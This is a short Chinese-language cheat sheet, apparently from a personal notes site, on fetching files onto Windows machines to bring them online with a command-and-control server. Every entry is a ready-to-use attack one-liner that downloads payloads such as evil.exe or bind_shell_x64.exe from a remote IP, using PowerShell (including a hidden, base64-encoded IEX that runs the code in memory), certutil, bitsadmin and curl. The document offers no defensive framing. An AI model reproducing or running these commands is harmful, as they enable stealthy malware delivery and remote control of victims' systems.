目录

Windows远程下载文件

windows CMD 下载远程文件,上线C2

# PowerShell

下载到本地

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.txt','evil.exe')
1

通过远程http请求内容,在内存里直接执行

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.1/evil.txt'))"
1

base64编码解决可能存在的转义问题(UTF-16 Little Endian编码),PowerShell 的 -EncodedCommand 要求使用 UTF-16LE 编码再 Base64

$command = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.1/evil.txt'))"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
Write-Output $encoded
1
2
3
4

powershell直接执行base64编码的命令,解决可能存在的转义问题

powershell -nop -w hidden -EncodedCommand <上面输出的base64>
1

# certutil

下载到当前目录

certutil -urlcache -split -f http://192.168.1.1/bind_shell_x64.exe bind_shell_x64.exe
1

# bitsadmin

bitsadmin /transfer jobName /download /priority high http://192.168.1.1/evil.exe evil.exe
1

# curl(win10及以上)

老系统不常见

curl -o bind_shell_x64.exe http://192.168.1.1/bind_shell_x64.exe
1
最后一次更新于: 2025/10/04, 14:38:57